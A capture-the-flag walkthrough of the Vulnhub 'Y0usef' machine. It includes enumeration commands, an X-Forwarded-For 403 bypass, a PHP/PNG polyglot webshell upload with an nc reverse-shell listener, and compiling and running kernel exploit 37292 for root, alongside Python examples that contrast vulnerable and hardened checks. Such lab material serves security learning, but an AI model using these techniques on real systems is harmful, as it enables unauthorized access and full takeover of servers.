Y0usef Walkthrough – Vulnhub – Writeup

Y0usef is an easy machine from Vulnhub. It requires a bit of enumeration at the beginning, but once you have a foothold the rest is relatively easy. I tested this on VirtualBox.

Link to the machine: https://www.vulnhub.com/entry/y0usef-1,624/


Identify the target

First, we have to identify the IP address of the target machine. To do this, the attacking machine and the target must be on the same network, so make sure your pentesting distro and the target VM are attached to the same NAT network.

sudo netdiscover -i eth0 -r 10.0.2.0/24
Netdiscover result – 10.0.2.64 is the target

Scan open ports

Next, we scan the target's open ports. Since this is a local lab, we can afford to scan all 65535 ports; against a remote target, scanning only the top ports would save time.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.64
Nmap scan result shows SSH and HTTP ports open

The results show that only SSH and HTTP are open. Without credentials there is nothing to do with SSH yet, so HTTP is the service to look further into.

Enumerate the web server

Now we check whether the web server has anything of interest.

Home page of the website

The homepage of the website doesn't contain any useful information, and neither does its source code. Therefore, we need to check whether we can find any hidden paths.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -e .html,.php,.txt -u http://10.0.2.64/FUZZ -of html -o dir.html

To my surprise, I didn't get anything using 'directory-list-2.3-big.txt', which is one of the largest wordlists. However, the 'raft' wordlist gave me a path.

FFUF result

Unfortunately, the path gave me a Forbidden error.

Forbidden error

Since this is the only result we got after waiting a long time, we have to find a way past the Forbidden response. One possibility is that the web app restricts access by client IP and sits behind a proxy, in which case it may read the client address from a forwarded-IP header rather than from the actual connection.

Reference: https://book.hacktricks.xyz/pentesting/pentesting-web#403-forbidden-basic-authentication-401-unauthorized-bypass

Upon adding the header X-Forwarded-For: 127.0.0.1, we could bypass the restriction. The application treats this client-supplied header as the true source address, so any client can simply claim to be localhost.

Bypass using X-Forwarded-For header
Login page after bypassing the restrictions
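As an added illustration (not part of the original writeup), here is the kind of access check that makes this bypass work, next to a hardened version that only trusts the header from a known proxy and reads the proxy-appended address. The trusted-proxy address, the attacker address and the list of candidate header names are assumptions for the example, not values taken from the Y0usef machine.

```python
import ipaddress

# Assumed address of the site's reverse proxy, if there is one. Hypothetical value.
TRUSTED_PROXIES = {"10.0.2.5"}


def _is_loopback(addr: str) -> bool:
    """Return True for 127.0.0.0/8 or ::1; treat unparsable input as not local."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def vulnerable_is_local(remote_addr: str, headers: dict) -> bool:
    """The weak check: when X-Forwarded-For is present, believe its first address.

    Every client can set this header, so anyone can claim to be 127.0.0.1.
    """
    xff = headers.get("X-Forwarded-For")
    client = xff.split(",")[0].strip() if xff else remote_addr
    return _is_loopback(client)


def hardened_is_local(remote_addr: str, headers: dict) -> bool:
    """Honour X-Forwarded-For only when the TCP peer is a known proxy, and then use
    the address that proxy appended (the rightmost entry), never the client-chosen
    first entry. Direct connections are judged on the socket address alone.
    """
    xff = headers.get("X-Forwarded-For")
    if remote_addr in TRUSTED_PROXIES and xff:
        client = xff.split(",")[-1].strip()
    else:
        client = remote_addr
    return _is_loopback(client)


def bypass_headers() -> dict:
    """The single header the writeup adds to get past the 403."""
    return {"X-Forwarded-For": "127.0.0.1"}


def candidate_headers(ip: str = "127.0.0.1") -> list:
    """Common forwarded-IP headers to try one at a time if the first does not work.
    This is a probing list, not a claim about what this particular app reads."""
    names = ["X-Forwarded-For", "X-Real-IP", "X-Client-IP",
             "X-Originating-IP", "X-Remote-Addr"]
    return [{name: ip} for name in names]


if __name__ == "__main__":
    attacker = "10.0.2.15"  # constructed: the attacking VM connecting directly
    print("vulnerable check:", vulnerable_is_local(attacker, bypass_headers()))  # True
    print("hardened check:  ", hardened_is_local(attacker, bypass_headers()))    # False
    # Same spoofed header, but arriving via the real proxy, which appended the true peer:
    via_proxy = {"X-Forwarded-For": "127.0.0.1, 10.0.2.15"}
    print("hardened via proxy:", hardened_is_local("10.0.2.5", via_proxy))        # False
```

The fix is not to strip the header but to stop trusting it from arbitrary peers: only a connection from a proxy you control can vouch for a forwarded address, and even then the entry the proxy itself appended is the only one it actually verified.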

I tried SQL injection on the login form but couldn't exploit it. However, the default credentials admin:admin worked. This gives us access to a dashboard that has no further restrictions.

Dashboard

Inject webshell

After logging in, we see that the app has a file upload feature, so we can try uploading a webshell.

Upload error – PHP file

When I tried to upload a PHP file, it gave me an error, but image files were allowed. So I downloaded a PNG file, 'nepcodex.png', and uploaded it with Burp Suite as a proxy. In the intercepted request, I changed the file extension to .php and appended the reverse shell code to the file body. The upload succeeded and the app showed a link to the uploaded file at the top of the page. Since the file was stored under the .php name we supplied, the server-side check evidently never validated the extension it was actually writing to disk.

Uploaded request
Uploaded response
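As an added example (not code from the original writeup), the following shows the three upload fields edited in Burp, an upload filter consistent with the behaviour observed on this page (rejecting on the declared Content-Type but storing the client's filename), and a hardened filter that decides on an extension allow-list plus the file's own bytes and picks the stored name server-side. The PHP stub, the filter logic and the file names are constructed for the example.

```python
import os
import uuid

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Constructed payload: a PNG signature followed by a PHP stub. The writeup appended
# reverse-shell code to nepcodex.png; here the PHP only echoes a marker.
POLYGLOT = PNG_MAGIC + b"\n<?php echo 'webshell'; ?>\n"

# Allow-list of image extensions and the magic bytes a file with that extension must start with.
ALLOWED = {
    ".png": PNG_MAGIC,
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def craft_upload(filename: str, content_type: str, data: bytes) -> dict:
    """The parts of the multipart request the attacker controls (what was edited in Burp)."""
    return {"filename": filename, "content_type": content_type, "data": data}


def weak_filter(upload: dict):
    """Accept or reject on the client-declared Content-Type alone, then store the file
    under the client-supplied name. Returns the stored name, or None when rejected."""
    if not upload["content_type"].startswith("image/"):
        return None
    return upload["filename"]


def hardened_filter(upload: dict):
    """Ignore the declared Content-Type. Require an allow-listed extension whose magic
    bytes match the body, and choose the stored name server-side so the client cannot
    pick an executable extension. Returns the stored name, or None when rejected."""
    ext = os.path.splitext(upload["filename"])[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not upload["data"].startswith(magic):
        return None
    # Serve the result from a directory where script execution is disabled.
    return uuid.uuid4().hex + ext


if __name__ == "__main__":
    attack = craft_upload("nepcodex.php", "image/png", POLYGLOT)
    print("weak filter stores:    ", weak_filter(attack))      # nepcodex.php
    print("hardened filter stores:", hardened_filter(attack))  # None
```

A plain PHP upload is rejected by both filters, while the renamed polyglot sails through the weak one and lands on disk as a .php file the web server will happily execute. Note that the hardened filter still accepts a PNG with PHP text inside it; that is harmless as long as the stored extension stays an image extension and the upload directory does not execute scripts, which is exactly why the server, not the client, must choose the stored name.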

We can now use this to get a reverse shell. First, start a listener on the attacking machine:

nc -nlvp 9001

Then I requested the uploaded file in the browser, which executed the PHP and connected back to the listener.

Executed script
Spawned reverse shell

Next, I upgraded the reverse shell to a fully interactive one using the steps in the following post.

Upgrade to an intelligent reverse shell

Escalate privileges

In /home there is a file 'user.txt' containing base64-encoded text, which decodes to a username and password.

/home path

Since we now have a password for the user, I logged in over SSH rather than continuing in the reverse shell.

Logged in as user yousef

Looking at the user's sudo permissions, we find that it can execute all commands as any user. Furthermore, the system runs an old kernel (3.13) with a known local privilege escalation, so there are two independent routes to root.

Sudo permissions of yousef and old kernel
Privilege escalation using sudo permissions

This gives us root on the machine. Now, let's look at the alternative route.

Linux Kernel 3.13 LPE

We can search for exploits in Kali Linux using searchsploit as follows. The relevant entry is 37292, the overlayfs local privilege escalation for Ubuntu kernels from 3.13.0 up to (but not including) 3.19.

searchsploit linux kernel 3.13
Exploits relating to Linux Kernel

Next, I copied the exploit into my working directory and transferred it to the target using SCP, since we already have yousef's password.

searchsploit -m 37292
Get the exploit to the working directory
scp 37292.c yousef@10.0.2.64:/tmp
Transfer file using scp

Lastly, I switched to the /tmp directory, compiled the code on the target (gcc was available there) and executed it. Kernel exploits can leave a machine unstable, so on a real engagement the sudo route above is the safer choice when both are available.

cd /tmp
gcc 37292.c -o exploit
./exploit
Privilege escalation using Linux kernel exploit
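A check worth automating when a searchsploit title gives a version window like "3.13.0 < 3.19": deciding whether the target's uname -r output falls inside it. The example below is added here and is not part of the original writeup; the kernel strings it tests against are constructed, and the only range it knows is the one for EDB-ID 37292. It also shows the classic mistake of comparing version strings lexically, which would wrongly rank 3.9 above 3.13.

```python
import re

# Version window for EDB-ID 37292 (overlayfs LPE): 3.13.0 <= kernel < 3.19, as in the
# searchsploit title. A match makes the exploit a candidate, not a guarantee: distro
# kernels may carry backported fixes, and the exploit still needs overlayfs available.
EDB_37292_RANGE = ((3, 13, 0), (3, 19, 0))


def parse_kernel_version(uname_r: str) -> tuple:
    """Turn uname -r output such as '3.13.0-32-generic' into a comparable tuple (3, 13, 0).

    A missing patch level ('4.4') is treated as 0. Suffixes like '-generic' are ignored.
    """
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError(f"unrecognised kernel version: {uname_r!r}")
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def in_range(version: tuple, lo: tuple, hi: tuple) -> bool:
    """Inclusive lower bound, exclusive upper bound, compared as integer tuples."""
    return lo <= version < hi


def candidate_for_37292(uname_r: str) -> bool:
    """True if the kernel version string falls inside the 37292 window."""
    return in_range(parse_kernel_version(uname_r), *EDB_37292_RANGE)


if __name__ == "__main__":
    # Constructed uname -r samples, not output captured from the Y0usef box.
    for sample in ["3.13.0-32-generic", "3.18.0", "3.19.0-25-generic", "3.9.0", "4.4.0-148-generic"]:
        print(f"{sample:22s} candidate={candidate_for_37292(sample)}")
    # Why tuples and not strings: lexically '3.9.0' sorts after '3.13.0'.
    print("string compare says 3.9.0 > 3.13.0:", "3.9.0" > "3.13.0")  # True, and wrong
```

On the target the same decision is made from uname -r; a hit only tells you which exploit to try first, and the exploit's own pre-flight checks (and, on a production host, the risk of a crash) still apply.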
